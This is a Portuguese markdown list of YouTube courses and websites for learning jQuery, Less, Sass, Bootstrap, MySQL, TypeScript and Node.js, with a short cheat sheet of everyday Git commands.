- [Curso de jQuery](https://www.youtube.com/playlist?list=PLu_qC9Zc8vNwlFP_1hSOXN2906iN_tvBL)
> Cursos para aprender jQuery em Inglês
- [jQuery Full Course 2022 | jQuery Tutorial For Beginners | jQuery Tutorial | Simplilearn](https://www.youtube.com/watch?v=Rkvn_MA04fo&ab_channel=Simplilearn)
- [Learn jQuery for Beginners - Full Course](https://www.youtube.com/watch?v=ScoURsEM_yU&ab_channel=TechZ)
- [jQuery - Beau teaches JavaScript](https://www.youtube.com/playlist?list=PLWKjhJtqVAbkyK9woUZUtunToLtNGoQHB)
- [jQuery Tutorial for Beginners](https://www.youtube.com/playlist?list=PLoYCgNOIyGABdI2V8I_SWo22tFpgh2s6_)
- [jQuery Tutorial | jQuery Tutorial For Beginners | jQuery | jQuery full course | Simplilearn](https://www.youtube.com/watch?v=QhQ4m5g2fhA&ab_channel=Simplilearn)
- [jQuery Full Course | jQuery Tutorial For Beginners | jQuery Certification Training | Edureka](https://www.youtube.com/watch?v=HgvIox6ehkM&ab_channel=edureka%21)
- [jQuery Advanced Full Course | jQuery Tutorial | jQuery Tutorial For Beginners | SimpliCode](https://www.youtube.com/watch?v=OSjDGLfNsDI&ab_channel=SimpliCode)
## 🐢 Sites e cursos para aprender Less
> Cursos para aprender jQuery em Português
- [Curso de Less - Jornada do Dev](https://goo.gl/Y5UkLQ)
- [Curso de Less - Filipe Morelli Developer](https://www.youtube.com/playlist?list=PLWhiA_CuQkbBSfhS9nzc5BkopBY-22K-D)
- [Curso de Less - Daniel Martínez](https://www.youtube.com/playlist?list=PLwzKFCxxOMjPUOJitRL31rD1Zsd030sYX)
- [Curso de Less - Programador Novato](https://www.youtube.com/playlist?list=PLCTD_CpMeEKT70itw70uVs0vlFbvbCPQN)
## 🐱 Sites e cursos para aprender Sass
> Cursos para aprender Sass em Português
- [Sass/SCSS para iniciantes + Bônus com React](https://www.youtube.com/watch?v=UKFzAu9AR7w&ab_channel=AlgaWorks)
- [Aprenda SASS em 1 hora | Curso de SASS](https://www.youtube.com/watch?v=Wo5t3uUV8n4)
- [SASS de 0 a 100](https://www.youtube.com/playlist?list=PLCTD_CpMeEKQXywJB8KMN_-GccZuVf9ag)
- [Curso Básico de SASS desde 0](https://www.youtube.com/playlist?list=PLhSj3UTs2_yVyMlZyW-NAbgjtgAgLBzFP)
- [Curso de SASS - Lucas Ribeiro](https://www.youtube.com/playlist?list=PLF3tsQa29IM2KG0OIHYxN_uqaVSI0gnbg)
- [Curso de Sass - Vida FullStack](https://www.youtube.com/playlist?list=PLMy95_4XE08OmaSd_GOLKNkqhoJFvg7w7)
- [Curso de Sass - Amanda Vilela](https://www.youtube.com/playlist?list=PL97KElaimHeGRtfkksKwxg6IGVZi_cR7J)
> Cursos para aprender Sass em Espanhol
- [Curso de Sass para principiantes desde cero](https://www.youtube.com/playlist?list=PLPl81lqbj-4I4VwUdjbV2iFg7wispiXKP)
- [Curso de Sass - El Exilio de Atlas](https://www.youtube.com/playlist?list=PL0FXkz5ILg9Y0ADavZORWRUU3mqG80N8s)
- [Curso Básico de Sass - Tutoriales Front-End](https://www.youtube.com/playlist?list=PL5mZlJHWhPyxKrfbsw5-1GxErJrOrSkWI)
> Cursos para aprender Sass em Inglês
- [Curso de Sass - Jornada do Dev](https://goo.gl/DzRv1e)
- [Sass, BEM, & Responsive Design (4 hr beginners course)](https://www.youtube.com/watch?v=jfMHA8SqUL4&ab_channel=CoderCoder)
- [SASS Tutorial (Build Your Own CSS Library)](https://www.youtube.com/playlist?list=PL4cUxeGkcC9jxJX7vojNVK-o8ubDZEcNb)
- [Sass Tutorial for Beginners - CSS With Superpowers](https://www.youtube.com/watch?v=_a5j7KoflTs&ab_channel=freeCodeCamp.org)
- [SASS Tutorial](https://www.youtube.com/playlist?list=PL4cUxeGkcC9iEwigam3gTjU_7IA3W2WZA)
- [Sass & Scss - Supercharge Your CSS | Tutorial](https://www.youtube.com/playlist?list=PLLAZ4kZ9dFpOMcA70cU3gZZAXeCR9CNS9)
- [Learning SASS](https://www.youtube.com/playlist?list=PLyuRouwmQCjlzPHwHOAIfIFXkf6J8Q_qy)
- [Learn Sass In 20 Minutes | Sass Crash Course](https://www.youtube.com/watch?v=Zz6eOVaaelI&ab_channel=developedbyed)
- [Sass Crash Course](https://www.youtube.com/watch?v=nu5mdN2JIwM&ab_channel=TraversyMedia)
- [Sass in 100 Seconds](https://www.youtube.com/watch?v=akDIJa0AP5c&t=53s&ab_channel=Fireship)
- [Sass Crash Course 2022](https://www.youtube.com/watch?v=BEdCOvJ5RY4&ab_channel=PixelRocket)
- [7 ways to deal with CSS](https://www.youtube.com/watch?v=ouncVBiye_M&ab_channel=Fireship)
## 🐰 Sites e cursos para aprender Bootstrap
> Cursos para aprender Bootstrap em Português
- [Curso de Bootstrap - Matheus Battisti - Hora de Codar](https://www.youtube.com/playlist?list=PLnDvRpP8Bnexu5wvxogy6N49_S5Xk8Cze)
- [Curso de Bootstrap - CFBCursos](https://www.youtube.com/playlist?list=PLx4x_zx8csUgop9qBqm6ReuNa3XraZBrc)
- [Curso completo de Bootstrap 5- Diego Mariano](https://www.youtube.com/playlist?list=PLjS7DS1TxzJIkIgR8AR6Lu0deOOs0AQuv)
- [Bootstrap 5 Funtamental](https://www.youtube.com/playlist?list=PLXik_5Br-zO-iwhAe12sirOo_LZ0t-qEm)
- [Curso de Bootstrap 5 - Ricardo Maroquio](https://www.youtube.com/playlist?list=PL0YuSuacUEWuJN3qb6NP15bzqd8w_oAj7)
- [Criando um site com Bootstrap 4](https://www.youtube.com/playlist?list=PLBbHLUbqqCrTwIrdix6kl84m4OPE0JexR)
- [Aprenda Bootstrap 5 criando um projeto - curso fundamentos de Bootstrap 2021](https://www.youtube.com/watch?v=jJUpJA1GJHw&ab_channel=MatheusBattisti-HoradeCodar)
- [FORMULÁRIO MULTISTEP COM REACT.JS - FORMULÁRIO DE MÚLTIPLAS ETAPAS REACT](https://www.youtube.com/watch?v=PRSruHX_eig&ab_channel=MatheusBattisti-HoradeCodar)
- [Bootstrap Guia para Iniciantes 2022 - Hostinger Brasil](https://www.youtube.com/watch?v=jsTJL6Da5wc&ab_channel=HostingerBrasil)
> Cursos para aprender Bootstrap em Inglês
- [Bootstrap CSS Framework - Full Course for Beginners](https://www.youtube.com/watch?v=-qfEOE4vtxE&ab_channel=freeCodeCamp.org)
- [Bootstrap 5 Crash Course](https://www.youtube.com/watch?v=Jyvffr3aCp0&ab_channel=WebDevSimplified)
- [Bootstrap 5 Tutorial](https://www.youtube.com/playlist?list=PL4cUxeGkcC9joIM91nLzd_qaH_AimmdAR)
- [Bootstrap 5 Crash Course | Website Build & Deploy](https://www.youtube.com/watch?v=4sosXZsdy-s&ab_channel=TraversyMedia)
- [Getting Started with Bootstrap 5 for Beginners - Crash Course](https://www.youtube.com/watch?v=1nxSE0R27Gg&ab_channel=DesignCourse)
- [Learn Bootstrap 5 and SASS by Building a Portfolio Website - Full Course](https://www.youtube.com/watch?v=iJKCj8uAHz8&ab_channel=freeCodeCamp.org)
- [Bootstrap CSS Framework For Beginners [TAGALOG]](https://www.youtube.com/watch?v=NUCvrUU8NFo&ab_channel=PinoyFreeCoder)
- [Learn Bootstrap in less than 20 minutes - Responsive Website Tutorial](https://www.youtube.com/watch?v=eow125xV5-c&ab_channel=Raddy)
- [Bootstrap 4 Tutorials](https://www.youtube.com/playlist?list=PL4cUxeGkcC9jE_cGvLLC60C_PeF_24pvv)
- [Bootstrap 4 Tutorial + Project](https://www.youtube.com/watch?v=Uhy3gtZoeOM&ab_channel=CodingAddict)
## 🐤 Sites e cursos para aprender MySQL
> Sites para aprender MySQL
- [SQLZOO](https://sqlzoo.net/wiki/SQL_Tutorial)
- [SQLBolt](https://sqlbolt.com/)
- [LinuxJedi](https://linuxjedi.co.uk/tag/mysql/)
- [SQLCourse](https://www.sqlcourse.com/)
- [CodeQuizzes](https://www.codequizzes.com/apache-spark/spark/datasets-spark-sql)
- [Planet MySQL](https://planet.mysql.com/pt/)
- [MySQL Learn2torials](https://learn2torials.com/category/mysql)
- [Learn MySQL, Memrise](https://app.memrise.com/course/700054/learn-mysql/)
- [Tizag MySQL Tutorials](http://www.tizag.com/mysqlTutorial/)
- [W3Schools SQL Tutorials](https://www.w3schools.com/sql/)
- [SQL Basics Khan Academy](https://www.khanacademy.org/computing/computer-programming/sql)
- [Phptpoint MySQL Tutorial](https://www.phptpoint.com/mysql-tutorial/)
- [RoseIndia MySQL Tutorials](https://www.roseindia.net/mysql/)
- [MySQL on Linux Like Geeks](https://likegeeks.com/mysql-on-linux-beginners-tutorial/)
- [Mastering MySQL by Mark Leith](http://www.markleith.co.uk/)
- [Tutorials Point MySQL Tutorial](https://www.tutorialspoint.com/mysql/index.htm)
- [KillerPHP MySQL Video Tutorials](https://www.killerphp.com/mysql/videos/)
- [PYnative MySQL Database Tutorial](https://pynative.com/python/databases/)
- [Digital Ocean Basic MySQL Tutorial](https://www.digitalocean.com/community/tags/mysql)
- [Journal to SQL Authority, Pinal Dave](https://blog.sqlauthority.com/)
- [MySQL Tutorial, Learn MySQL Fast, Easy and Fun](https://www.mysqltutorial.org/)
> Cursos para aprender MySQL em Português
- [Curso de Banco de Dados MySQL](https://www.youtube.com/playlist?list=PLHz_AreHm4dkBs-795Dsgvau_ekxg8g1r)
- [Curso de MySQL - Bóson Treinamentos](https://www.youtube.com/playlist?list=PLucm8g_ezqNrWAQH2B_0AnrFY5dJcgOLR)
- [Curso SQL Completo 2022 em 4 horas - Dev Aprender](https://www.youtube.com/watch?v=G7bMwefn8RQ&ab_channel=DevAprender)
- [Curso de SQL com MySQL (Completo) - Ótavio Miranda](https://www.youtube.com/playlist?list=PLbIBj8vQhvm2WT-pjGS5x7zUzmh4VgvRk)
- [MySQL - Curso Completo para Iniciantes e Estudantes](https://www.youtube.com/playlist?list=PLOPt_yd2VLWGEnSzO-Sc9MYjs7GZadX1f)
- [Curso de MySQL - Daves Tecnologia](https://www.youtube.com/playlist?list=PL5EmR7zuTn_ZGtE7A5PJjzQ0u7gicicLK)
- [Curso de SQL - CFBCursos](https://www.youtube.com/playlist?list=PLx4x_zx8csUgQUjExcssR3utb3JIX6Kra)
- [Curso Gratuito MySQL Server](https://www.youtube.com/playlist?list=PLiLrXujC4CW1HSOb8i7j8qXIJmSqX44KH)
- [Curso de MySQL - Diego Moisset](https://www.youtube.com/playlist?list=PLIygiKpYTC_4KmkW7AKH87nDWtb29jHvN)
- [Curso completo MySQL WorkBench](https://www.youtube.com/playlist?list=PLq-sApY8QuyeEq4L_ECA7yYgOJH6IUphP)
- [Curso de MySQL 2022 - IS](https://www.youtube.com/playlist?list=PL-6S8_azQ-MrCeQgZ1ZaD8Be3EVW4wEKx)
- [MySql/MariaDB - Do básico ao avançado](https://www.youtube.com/playlist?list=PLfvOpw8k80WqyrR7P7fMNREW2Q82xJlpO)
- [Curso de PHP com MySQL](https://www.youtube.com/playlist?list=PLucm8g_ezqNrkPSrXiYgGXXkK4x245cvV)
> Cursos para aprender MySQL em Inglês
- [The New Boston MySQL Videos](https://www.youtube.com/playlist?list=PL32BC9C878BA72085)
- [MySQL For Beginners, Programming With Mosh](https://www.youtube.com/watch?v=7S_tz1z_5bA&ab_channel=ProgrammingwithMosh)
- [Complete MySQL Beginner to Expert](https://www.youtube.com/watch?v=en6YPAgc6WM&ab_channel=FullCourse)
- [Full MySQL Course for Beginners](https://www.youtube.com/playlist?list=PLyuRouwmQCjlXvBkTfGeDTq79r9_GoMt9)
- [MySQL Complete Tutorial for Beginners 2022](https://www.youtube.com/playlist?list=PLjVLYmrlmjGeyCPgdHL2vWmEGKxcpsC0E)
- [SQL for Beginners (MySQL)](https://www.youtube.com/playlist?list=PLUDwpEzHYYLvWEwDxZViN1shP-pGyZdtT)
- [MySQL Course](https://www.youtube.com/playlist?list=PLBlpUqEneF0-xZ1ctyLVqhwJyoQsyfOsO)
- [MySQL Tutorial For Beginners - Edureka](https://www.youtube.com/playlist?list=PL9ooVrP1hQOGECN1oA2iXcWFBTRYUxzQG)
- [MySQL Tutorial for Beginners](https://www.youtube.com/playlist?list=PLS1QulWo1RIY4auvfxAHS9m_fZJ2wxSse)
- [MySQL Tutorial for beginner - ProgrammingKnowledge](https://www.youtube.com/playlist?list=PLS1QulWo1RIahlYDqHWZb81qsKgEvPiHn)
- [MySQL DBA Tutorial - Mughees Ahmed](https://www.youtube.com/playlist?list=PLd5sTGXltJ-l9PKT2Bynhg0Ou2uESOJiH)
- [MySQL DBA Tutorial - TechBrothers](https://www.youtube.com/playlist?list=PLWf6TEjiiuICV0BARDhRC0JvNKHC5MDEU)
- [SQL Tutorial - Full Database Course for Beginners](https://www.youtube.com/watch?v=HXV3zeQKqGY&ab_channel=freeCodeCamp.org)
## 🐮 Sites e cursos para aprender Git e Github
- [Git 4 Noobs](https://github.com/DanielHe4rt/git4noobs)
- [Comandos Git](https://github.com/theandersonn/comandos-git)
- [Aprenda Git](https://learngitbranching.js.org/)
- [Git School](https://git-school.github.io/visualizing-git/)
- [Git Flow Cheatsheet](https://danielkummer.github.io/git-flow-cheatsheet/)
- [Git cheat sheet](https://training.github.com/downloads/pt_BR/github-git-cheat-sheet.pdf)
<details>
<summary>📝 Necessário para sobrevivencia</summary>
- [Site para instalar o Git](https://git-scm.com/downloads)
- Configurações iniciais do Git
```bash
git config --global user.name <nome de usuário> # => Configura nome de usuário que marcará os commits
git config --global user.email <email@email.com.br> # => Configura o email que marcará os commits
```
- Inicializando um repositório
```bash
git init
```
- Clonar projeto remoto
```bash
git pull <link>
```
- Adicionando um repositório remoto
```bash
git remote add origin https://github.com/User/Repository.git
```
- Verifica o status do repositório
```bash
git status
```
- Trackear o que não foi trackeado, inserir tudo
```bash
git add . #=> Ou -A
```
- Realizar Commit
```bash
git commit -m "inserir um comentário significativo" # => Ou -am
```
[Diferença entre as flags -m e -am](https://pt.stackoverflow.com/questions/344986/diferen%C3%A7a-do-git-commit-am-e-m)
- lista de commits
```bash
git log
#=> ou
git log --oneline #=> exibe log com hash e título do commit
```
- Desfazer alterações
```bash
git reset # => --soft / --mixed / --hard
```
- Mudar a branch atual
```bash
git checkout <branch>
# ou
git checkout -b <branch> # => Cria e muda para a branch passada
```
- Checar o que houve nas alterações
```bash
git diff
# ou
git diff --name-only <SHA1> <SHA2> # Mostra apenas a alteração entre commits especificados por identificador
git diff --name-only HEAD~<num> HEAD~<num> # ou por contagem
# ou
git diff <nome_do.arquivo> # => Mostra apenas a alteração feita naquele arquivo
```
- Retroceder até certa posição
```bash
git checkout HEAD -- "diff" <nome_do.arquivo>
```
- Envia todos os commits do branch local
```bash
git push <alias> <branch>
```
- Baixa o histórico e incorpora as mudanças
```bash
git pull
```
- Combina o marcador do branch no branch local
```bash
git merge [marcador]/[branch]
```
- Visualizando todas as branches existentes no repositório
```bash
git branch #=> local
# => ou
git branch --all #=> local e remoto
```
- Deletando Branchs
```bash
# Local
git branch -D <nome-branch>
git branch -d <nome-branch>
# Remoto
git push origin <:nome-branch>
# Todas branch que não se encontram no repositório remoto
git branch --merged ##
git branch -r | egrep -v -f /dev/fd/0 <(git branch -vv | grep origin | grep -v "master") | xargs git branch -d
# Todas as branches no repositório local (exceto a master)
git branch | grep -v "master" | xargs git branch -D
```
</details>
## 🐒 Sites e cursos para aprender TypeScript
> Cursos para aprender TypeScript em Português
- [Curso de TypeScript na pŕatica - aprenda TypeScript em 1 hora](https://www.youtube.com/watch?v=lCemyQeSCV8&t=634s&ab_channel=MatheusBattisti-HoradeCodar)
- [Curso de TypeScript para Completos Iniciantes](https://www.youtube.com/watch?v=ppDsxbUNtNQ&t=1s&ab_channel=FelipeRocha%E2%80%A2dicasparadevs)
- [TypeScript, o início, de forma prática | MasterClass #07](https://www.youtube.com/watch?v=0mYq5LrQN1s&t=2s&ab_channel=Rocketseat)
- [Intensivão de Clean Architecture e TypeScript](https://www.youtube.com/watch?v=yLPxkIxbNDg&t=3915s&ab_channel=FullCycle)
- [TypeScript Course for Beginners - Learn TypeScript from Scratch!](https://www.youtube.com/watch?v=BwuLxPH8IDs&ab_channel=Academind)
- [TypeScript Crash Course](https://www.youtube.com/watch?v=BCg4U1FzODs&t=1s&ab_channel=TraversyMedia)
- [Esse é o motivo para você começar a estudar TypeScript ](https://www.youtube.com/watch?v=JbVBPatmLr8&ab_channel=AndreIacono)
- [React & TypeScript - Course for Beginners](https://www.youtube.com/watch?v=FJDVKeh7RJI&ab_channel=freeCodeCamp.org)
- [TypeScript - Zero to Hero | O que é TypeScript? #01](https://www.youtube.com/watch?v=u7K1sdnCv5Y&list=PLb2HQ45KP0Wsk-p_0c6ImqBAEFEY-LU9H&ab_channel=GlauciaLemos)
- [Curso de react: Aula 01 - Começando com ReactJS](https://www.youtube.com/watch?v=1bEbBkWc4-I&list=PL29TaWXah3iZktD5o1IHbc7JDqG_80iOm&ab_channel=LucasSouzaDev)
- [Curso TypeScript do Básico ao avançado - Tipagem de Dados #01](https://www.youtube.com/watch?v=Z0RlhHuw6hk&list=PL4iwH9RF8xHlxBrCZImFELtiew3TneihE&ab_channel=PogCast)
- [Curso de Typescript - Aula 1: O que é o typescript?](https://www.youtube.com/watch?v=3LPWQtvxHOk&list=PLbV6TI03ZWYWwU5p9ZBH8oJTCjgneX53u&ab_channel=DanielBerg)
- [API Rest, Node e Typescript: #00 - Apresentação do curso, tecnologias usadas e muito mais](https://www.youtube.com/watch?v=SVepTuBK4V0&list=PL29TaWXah3iaaXDFPgTHiFMBF6wQahurP&ab_channel=LucasSouzaDev)
- [Curso de Node.js completo com Typescript, Jest, TDD, Github](https://www.youtube.com/watch?v=W2ld5xRS3cY&list=PLz_YTBuxtxt6_Zf1h-qzNsvVt46H8ziKh&ab_channel=WaldemarNeto-DevLab)
- [React, Material UI 5 e Typescript: #00 - Introdução](https://www.youtube.com/watch?v=wLH1Vv86I44&list=PL29TaWXah3iaqOejItvW--TaFr9NcruyQ&ab_channel=LucasSouzaDev)
- [TypeScript - Aprendendo Junto 00 - Introdução ao curso](https://www.youtube.com/watch?v=67ki0t_VWc0&list=PL62G310vn6nGg5OzjxE8FbYDzCs_UqrUs&ab_channel=DevDojo)
- [Curso TypeScript para Desenvolvedores C# - Aula 00: Introdução à TypeScript](https://www.youtube.com/watch?v=SbAzEptUwI4&list=PLb2HQ45KP0Wt32eCnju3lyncXUvDV5Nob&ab_channel=GlauciaLemos)
- [Curso POO Typescript Aula 00 - Como Instalar Typescript - Para Iniciantes](https://www.youtube.com/watch?v=Xv7nNA-DtRE&list=PLnV7i1DUV_zMKEBTQ-wwlbyop8yVAh2tc&ab_channel=NoobCode)
- [TypeScript #001 - Bem-vindos ao TypeScript](https://www.youtube.com/watch?v=DF9jY0ITt3Q&list=PLXik_5Br-zO9SEz-3tuy1UIcU6X0GZo4i&ab_channel=Jo%C3%A3oRibeiro)
- [Clean Architecture & Typescript - BDD Specs + Use Cases](https://www.youtube.com/watch?v=7ylqtGk9bTo&list=PL9aKtVrF05DxIrtD3CuXGnzq8Q0IZ-t8J&ab_channel=Mango)
- [TypeORM #0 - Preparando ambiente e conhecendo o Docker](https://www.youtube.com/watch?v=ZBlW5IBdhKk&list=PLDqnSpzNKDvn-3cpMf3yPn7gTnb3ooy4b&ab_channel=AngeloLuz)
- [Criando site com Typescript#01 - Apresentação do curso](https://www.youtube.com/watch?v=JA2Gx-7Fy7g&list=PLyugqHiq-SKfPI4of2RbSdtzBfmwioERL&ab_channel=ClubeFull-Stack)
- [Curso de Typescript - ¿ Que es #TypeScript ?](https://www.youtube.com/watch?v=ZwfoXOCpdCw&list=PL4qycS8CTHju8c4A06J_Vjtllyo6Pnc1G&ab_channel=ProCodeTv)
- [01 - Curso de Orientação a Objetos no TypeScript - Classes e Objetos](https://www.youtube.com/watch?v=_Pi69njCXUU&list=PLVSNL1PHDWvQ8vKE5T2JTlLE4rXpFH3fM&ab_channel=CarlosFerreira-EspecializaTi)
- [TypeORM #0 - Preparando ambiente e conhecendo o Docker](https://www.youtube.com/watch?v=ZBlW5IBdhKk&list=PLDqnSpzNKDvn-3cpMf3yPn7gTnb3ooy4b&ab_channel=AngeloLuz)
- [Criando site com Typescript#01 - Apresentação do curso](https://www.youtube.com/watch?v=JA2Gx-7Fy7g&list=PLyugqHiq-SKfPI4of2RbSdtzBfmwioERL&ab_channel=ClubeFull-Stack)
> Cursos para aprender TypeScript em Inglês
- [Learn TypeScript – Full Tutorial](https://www.youtube.com/watch?v=30LWjhZzg50&ab_channel=freeCodeCamp.org)
- [TypeScript Crash Course](https://www.youtube.com/watch?v=BCg4U1FzODs&t=1s&ab_channel=TraversyMedia)
- [TypeScript Course for Beginners - Learn TypeScript from Scratch!](https://www.youtube.com/watch?v=BwuLxPH8IDs&ab_channel=Academind)
- [How to Setup Node.js with TypeScript in 2023](https://www.youtube.com/watch?v=H91aqUHn8sE&ab_channel=BeyondFireship)
- [How To Create An Advanced Shopping Cart With React and TypeScript](https://www.youtube.com/watch?v=lATafp15HWA&ab_channel=WebDevSimplified)
- [TypeScript Tutorial for Beginners](https://www.youtube.com/watch?v=d56mG7DezGs&ab_channel=ProgrammingwithMosh)
- [TypeScript Full Beginner Course](https://www.youtube.com/watch?v=01txIbtssj0&ab_channel=Bitfumes)
- [TypeScript Course - Beginner to Advanced TypeScript Tutorial [2022]](https://www.youtube.com/watch?v=vcNtrYfroDY&ab_channel=Cloudaffle)
- [React & TypeScript - Course for Beginners](https://www.youtube.com/watch?v=FJDVKeh7RJI&ab_channel=freeCodeCamp.org)
## 🐌 Sites e cursos para aprender Node.js
> Cursos para aprender Node.js em Português
- [Curso de Node.js Para Completos Iniciantes](https://www.youtube.com/watch?v=IOfDoyP1Aq0&t=963s&ab_channel=FelipeRocha%E2%80%A2dicasparadevs)
- [COMEÇANDO COM NODE.JS EM 2022](https://www.youtube.com/watch?v=fm4_EuCsQwg&t=1s&ab_channel=Rocketseat)
- [Autenticação com Node.js e MongoDB com JWT - Login e Registro com Node.js](https://www.youtube.com/watch?v=qEBoZ8lJR3k&ab_channel=MatheusBattisti-HoradeCodar)
- [Curso de Node.JS - O que é Node.JS #01](https://www.youtube.com/watch?v=LLqq6FemMNQ&list=PLJ_KhUnlXUPtbtLwaxxUxHqvcNQndmI4B&ab_channel=VictorLima-GuiadoProgramador)
- [Vamos aprender NodeJS? [Introdução, instalação, primeira aplicação NodeJS] - Curso de Node - Aula 01](https://www.youtube.com/watch?v=XN705pQeoyU&list=PLx4x_zx8csUjFC41ev2qX5dnr-0ThpoXE&ab_channel=CFBCursos)
- [Curso de Node.js completo com Typescript, Jest, TDD, Github... [Código atualizado 2022]](https://www.youtube.com/watch?v=W2ld5xRS3cY&list=PLz_YTBuxtxt6_Zf1h-qzNsvVt46H8ziKh&ab_channel=WaldemarNeto-DevLab)
- [O que é Node.js? - Curso - Aula Grátis #01](https://www.youtube.com/watch?v=irrkH6VII78&list=PLsGmTzb4NxK0_CENI1ThoFUNeyIgsZ32V&ab_channel=LuizTools)
- [Node.js #1 - O que é Node e como instalar o Node.js no Windows](https://www.youtube.com/watch?v=jqrKQEJ6DpY&list=PLmY5AEiqDWwBHJ3i_8MDSszXXRTcFdkSu&ab_channel=Celke)
- [Curso Node JS Completo: Aula 01 - Introdução e Instalação](https://www.youtube.com/watch?v=zxziRBDFjGc&list=PL2Fdisxwzt_cQ7SMv8Drlg2TcrOS5LDZq&ab_channel=Programa%C3%A7%C3%A3oWeb)
- [#01 Curso NodeJS com Typescript - Iniciando Ambiente](https://www.youtube.com/watch?v=GII-SyqjbqE&list=PLn3kOoc0oI2cQDdUEQxj75sxgRH53DmSc&ab_channel=AndrewRos%C3%A1rio)
- [Criando APIs com NodeJs - Aula 1: Instalação Node, NPM e VS Code](https://www.youtube.com/watch?v=wDWdqlYxfcw&list=PLHlHvK2lnJndvvycjBqQAbgEDqXxKLoqn&ab_channel=balta.io)
- [Curso React JS / Node JS - Configurando o Ambiente de Desenvolvimento](https://www.youtube.com/watch?v=hK59KYwQP3U&list=PL0QN_lbTofYcw7bzm8y-l2BMslKfMfNgr&ab_channel=codezero)
- [Criação de API com Node.JS e MySQL - CRUD Completo - Aula 01 - Preparação do Ambiente](https://www.youtube.com/watch?v=xGk_R8Q1epU&list=PL1hl9qLyFtfDXY9NO8F3TnjxezKJ_1HlI&ab_channel=ProfessorLozano)
- [API Rest, Node e Typescript: #00 - Apresentação do curso, tecnologias usadas e muito mais](https://www.youtube.com/watch?v=SVepTuBK4V0&list=PL29TaWXah3iaaXDFPgTHiFMBF6wQahurP&ab_channel=LucasSouzaDev)
- [Curso de Node.js [ #01 Fundamentos desde cero - Primeros Pasos ]](https://www.youtube.com/watch?v=mG4U9t5nWG8&list=PLPl81lqbj-4IEnmCXEJeEXPepr8gWtsl6&ab_channel=Bluuweb)
- [Aula #01 - Apresentação Mini Curso - Iniciando Desenvolvimento de API Restful - Node.js e Typescript](https://www.youtube.com/watch?v=M-pNDHC25Vg&list=PLE0DHiXlN_qp251xWxdb_stPj98y1auhc&ab_channel=JorgeAluizio)
- [001 - API em Node.js + TypeScript com Programação Funcional - Apresentação do projeto](https://www.youtube.com/watch?v=G-wGMfiLW0Y&list=PLr4c053wuXU_2sufpBUxu3bLRBbyWt4lX&ab_channel=queroser.ninja-FernandoDaciuk)
- [Node.js - 01 Instalação do Node.js](https://www.youtube.com/watch?v=D8qWu0MGyuQ&list=PLfvOpw8k80WqZsXphHeeSVNKr6EovKir-&ab_channel=DFILITTO)
- [API com Node.JS - Passo 0 - Introdução (O que é uma REST API?)](https://www.youtube.com/watch?v=d_vXgK4uZJM&list=PLWgD0gfm500EMEDPyb3Orb28i7HK5_DkR&ab_channel=Maransatto)
- [Curso de Node.JS - #01 O que é Node.js](https://www.youtube.com/watch?v=aeRVisIgABA&list=PLJ0IKu7KZpCRCJgiT6jL4jJgssEcTBsg7&ab_channel=ProgramadorTech)
- [Curso de Node JS Aula 01 Baixar e instalar o Node JS. Testar e instalar ferramentas extras](https://www.youtube.com/watch?v=05WeJCU8CJ4&list=PLnex8IkmReXwCyR-cGkyy8tCVAW7fGZow&ab_channel=ProfessorEdsonMaia)
- [Aula 1.1 - Criando o primeiro App completo com Node.js, Postgres e front com Javascript puro](https://www.youtube.com/watch?v=TMdlKvoHxNI&list=PLAxN8g6Knm0camfON299B-vl31IYQhA8Q&ab_channel=Prof.JesielViana)
- [Curso React + Node Js + React Native - Introdução. Aula 1](https://www.youtube.com/watch?v=veQ0JzX_g3w&list=PLMg7nm9OcrdlhTsN2PvLbNveJYWrHMQZv&ab_channel=MentorNerd)
- [Node.js Básico 01 - Introdução](https://www.youtube.com/watch?v=F2cNmWNZSM0&list=PLWXw8Gu52TRLBgfIclx1Nh8LA60knsxY9&ab_channel=RalfLima)
> Cursos para aprender Node.js em Inglês
- [Node.js and Express.js - Full Course](https://www.youtube.com/watch?v=Oe421EPjeBE&t=176s&ab_channel=freeCodeCamp.org)
- [Node.js Full Course for Beginners | Complete All-in-One Tutorial | 7 Hours](https://www.youtube.com/watch?v=f2EqECiTBL8&ab_channel=DaveGray)
- [Node.js Tutorial for Beginners: Learn Node in 1 Hour](https://www.youtube.com/watch?v=TlB_eWDSMt4&ab_channel=ProgrammingwithMosh)
- [Node.js Tutorial For Beginners | Node JS Crash Course](https://www.youtube.com/watch?v=zQRrXTSkvfw&ab_channel=developedbyed)
- [Node.js / Express Course - Build 4 Projects](https://www.youtube.com/watch?v=qwfE7fSVaZM&t=1s&ab_channel=freeCodeCamp.org)
- [Node.js Ultimate Beginner’s Guide in 7 Easy Steps](https://www.youtube.com/watch?v=ENrzD9HAZK4&ab_channel=Fireship)
- [Node.js Tutorial for Beginners 1 - Node.js Introduction](https://www.youtube.com/watch?v=spPtAEmwys4&list=PLS1QulWo1RIb8IwHYfah5pxGU5jgNiEbK&ab_channel=ProgrammingKnowledge)
- [Node js tutorial #1 what is Node js | Introduction](https://www.youtube.com/watch?v=_sPLVYXfyDE&list=PL8p2I9GklV45ihqIep4n3_VijItAkcibN&ab_channel=CodeStepByStep)
- [Node.js Tutorial - 1 - Introduction](https://www.youtube.com/watch?v=LAUi8pPlcUM&list=PLC3y8-rFHvwh8shCMHFA5kWxD9PaPwxaY&ab_channel=Codevolution)
- [Node.js Crash Course Tutorial #1 - Introduction & Setup](https://www.youtube.com/watch?v=zb3Qk8SG5Ms&list=PL4cUxeGkcC9jsz4LDYc6kv3ymONOKxwBU&ab_channel=TheNetNinja)
- [What is Node js? | Simplified Explanation](https://www.youtube.com/watch?v=yEHCfRWz-EI&list=PLsyeobzWxl7occsESx2X1E2R2Uw5wCoeG&ab_channel=Telusko)
- [Node JS Tutorial for Beginners #1 - Introduction](https://www.youtube.com/watch?v=w-7RQ46RgxU&list=PL4cUxeGkcC9gcy9lrvMJ75z9maRw4byYp&ab_channel=TheNetNinja)
- [Tech Talk: Server Scaling in Node.js](https://www.youtube.com/watch?v=w1IzRF6AkuI&list=PLiIKaud-klRGn7V0myJaSZzByPEX7VyiB&ab_channel=FullstackAcademy)
- [Node js Tutorial for Beginners - 1 - Introduction](https://www.youtube.com/watch?v=CTxrpmY1At8&list=PLC3y8-rFHvwhco_O8PS1iS9xRrdVTvSIz&ab_channel=Codevolution)
- [Express JS Tutorial #1 - Introduction | Node Express JS Tutorial](https://www.youtube.com/watch?v=KtnHb7FMk2Q&list=PLp50dWW_m40Vruw9uKGNqySCNFLXK5YiO&ab_channel=ARCTutorials)
- [Introduction to Node JS (Hindi)](https://www.youtube.com/watch?v=5XzUdbYNWrA&list=PLbGui_ZYuhijy1SpwtIS9IwL6OJdbr4kE&ab_channel=GeekyShows)
